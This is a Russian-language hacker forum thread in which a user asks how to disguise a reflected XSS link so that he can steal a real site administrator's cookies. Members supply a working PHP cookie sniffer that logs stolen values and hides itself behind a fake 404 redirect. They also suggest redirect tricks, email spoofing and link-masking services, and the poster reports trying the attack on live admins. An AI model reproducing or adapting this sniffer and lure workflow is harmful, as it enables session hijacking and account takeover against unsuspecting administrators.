Маскировка ссылки

[MaD_Spirit]

Привет.

Дело обстоит вот как - нашел активную хсс.
метод гет. проверка на алерт и документ.куки - положительна.

только вот в чем проблема - ява-скрипт светится в строке адреса как новогодняя елка (скрипт вставляется в один из параметров. там какая то лента анекдотов).
Как можно замаскировать или подменить его?

пока мне видится только так (это моя первая практика, поправьте если что) - личка админу, СИ, просьба пройти по ссылке и т.п. и т.д.

админ проходит - и его орлиный взгляд замечает редирект куков на мой скрипт.
хм.

поэтому хотелось бы узнать методики подмены или крипта ссылки.

спасибо

 

[Great]

новогодняя елка (скрипт вставляется в один из параметров. там какая то лента анекдотов).

насколько я знаю, это уже не активная XSS

крипта ссылки - разве что через uuencode

 

[[br]]

можешь если шлешь на мыло попробовать заспуфить адрес )

 

[MaD_Spirit]

а можно ли в яве параллельно с отсылкой куков написать оператор, который бы (хотя бы) сразу закрывал окно? типа свалить все ан баги сайта?
чтоб админ ен успел ничего прочитать.

есть такие операторы?

 

[Great]

window.close()
кажется так. только ослик спросит - хочешь ли ты закрыть окно. так что не катит

 

[MaD_Spirit]

а если сразу редирект допустим на страницу с 404 ошибкой?
можно ли в скрипте отсылать куки на сниффер и одновременно редиректить на другую страницу?

 

[pro5to]

угу

<meta http-equiv="Refresh" content="1; URL=lol.ru))">

кинь сниффак в главный каталог. Обзови его (типа) error.php
и сам index не забудь замаскировать

 

[MaD_Spirit]

не совсем понял

куда надо всунуть "мета хттп"? в страницу с ошибкой?

а как тогда составить запрос в скрипте чтобы он туда редиректил?

 

[@mbal]

window.location("paga_with_404.html");

Это в Js

 

[MaD_Spirit]

почему то ен получается так
"выполнено, но с ошибкой на странице"

 

[KillerXX7]

Добавь к своему аццкому коду следующую строку

window.location.href='http://куда пойти после сброса куков';

Только если что, я вообще ламер и тебе это не говорил :lol:

 

[pro5to]

б*я...

<meta http-equiv="Refresh" content="2; URL=http://ya.ru">
<?
if(strlen($QUERY_STRING)<2)exit;
header("Content-Type: image/png");
$im=ImageCreate(1, 1);
ImagePNG($im);
imagedestroy($im);

$fp=fopen("sniff.txt", "a");

fputs($fp,$QUERY_STRING."\n\n");
fclose($fp);
?>

снифф запишет куки и буде редирект на ya.ru (через 2 сек. достаточно и 1 сек.)

допустим :
www.Er.ru/errot.php - это твой сниффер
в нём код

<meta http-equiv="Refresh" content="1; URL=_ТУТ МОЖНО УКАЗАТЬ РЕДИРЕКТ НА САМ ФОРУМ (где XSS) НА ФАЙЛ С ОШИБКОЙ. _">
<?
if(strlen($QUERY_STRING)<2)exit;
header("Content-Type: image/png");
$im=ImageCreate(1, 1);
ImagePNG($im);
imagedestroy($im);

$fp=fopen("sniff.txt", "a");

fputs($fp,$QUERY_STRING."\n\n");
fclose($fp);
?>

и как админ клюнул на XSS его кинет на твой снифф и мгновенный редирект на урл этого же форума (типа: http://xss.pro/paga_with_404.html или любой другой файл с выводом ошибки)
я лично так делаю.

 

[~Real F@ck~]

Да не! Чё вы се голову парите! Один мой хороший друг сказал- http://loc.netsec.ru/ :punk:

 

[~Real F@ck~]

ettee проверил ток щас! Всё работает! ИМХО!

 

[MaD_Spirit]

~Real F@ck~
благодарю, проверим

не скрипт то работает. тока вот по ходу инженер из меня плохой - админы ен кликнули по ссылке;'(
скорее всего просекли, будем пробовать через сервис перенаправлений